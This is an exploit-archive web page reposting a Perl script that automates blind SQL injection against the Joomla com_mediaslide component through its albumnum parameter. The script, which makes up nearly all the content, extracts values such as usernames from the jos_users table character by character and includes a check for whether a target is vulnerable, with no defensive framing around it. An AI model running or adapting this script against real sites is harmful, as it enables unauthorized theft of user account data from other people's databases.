首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Joomla Component mediaslide (albumnum) Blind SQL Injection Exploit
来源:www.vfocus.net 作者:vfocus 发布时间:2008-02-16  
#!/usr/bin/perl
#inphex
#joomla com_mediaslide blind sql injection
use LWP::UserAgent;
use LWP::Simple;
use Switch;
use Digest::MD5 qw(md5 md5_hex md5_base64);
print "usage: $0 -h host.com -p /\n";
### use Getopt::Long; ###
$column = "username";
$table = "jos_users";
$regex = "preview_f2";
%cm_n_ = ("-h" => "host","-p" => "path","-c" => "column","-t" => "table","-r" => "regex");
$a = 0;
foreach  (@ARGV) {
$a++;
while (($k, $v) = each(%cm_n_)) {
if ($_ eq $k) {
${$v} = $ARGV[$a];
}
}
}

$i = 48;
$h = 1;
$f = 0;
$k = 0;
### Yeah,that's it... ###
while () {
    while ($i <= 90) {

    if(check($i,$h,1) == 1)
    {
    syswrite STDOUT,lc(chr($i));
    $h++;
$a_chr = $a_chr.chr($i);
    }

$i++;

}
push(@ffs,length($a_chr));
if (($#ffs -1) == $ffs) {
&check_vuln();
exit;
}
$i = 48;

}
#/

### :D ###
sub check($$$)
{
$i = shift;
$h = shift;
$m = shift;

switch ($m)
{
case 1 { $query = "%20AND%20SUBSTRING((SELECT%20".$column."%20FROM%20".$table."%20LIMIT%200,1),".$h.",1)=CHAR(".$i.")"; }
}

$ua = LWP::UserAgent->new;
$url = "http://".$host.$path."index.php?option=com_mediaslide&act=contact&id=1&albumnum=1".$query."";
$response = $ua->get($url);
$content = $response->content;
if($content =~ /$regex/) { return 0;} else { return 1 ;}
}
#/

sub check_vuln
{


$content = get("http://".$host.$path."index.php?option=com_mediaslide&act=contact&id=1&albumnum=1%20AND%201=1");
$content1 = get("http://".$host.$path."index.php?option=com_mediaslide&act=contact&id=1&albumnum=1%20AND%201=0");

foreach $bb1 (split(/\n/,$content)) {
$bb = $bb.$bb1;
}

foreach  $yy1 (split(/\n/,$content1)) {
$yy = $yy.$yy1;
}

$f =  md5_hex($bb);
$s = md5_hex($yy);

if ($f eq $s) {
print "\nprobably not vulnerable";    #could be that ads,texts etc.. change
exit;
} else { print "\nvulnerable..."; }
}

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Microsoft Office .WPS File Sta
·AuraCMS 1.62 Multiple Remote S
·MicroTik RouterOS <= 3.2 SNMPd
·Simple CMS <= 1.0.3 (indexen.p
·Yahoo! JukeBox MediaGrid Activ
·DESlock+ <= 3.2.6 DLMFENC.sys
·Yahoo! Music Jukebox 2.2 AddBu
·DESlock+ <= 3.2.6 local kernel
·A-Blog V.2 (id) XSS / Remote S
·DESlock+ <= 3.2.6 DLMFDISK.sys
·FaceBook PhotoUploader (ImageU
·sCssBoard (pwnpack) Multiple V
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved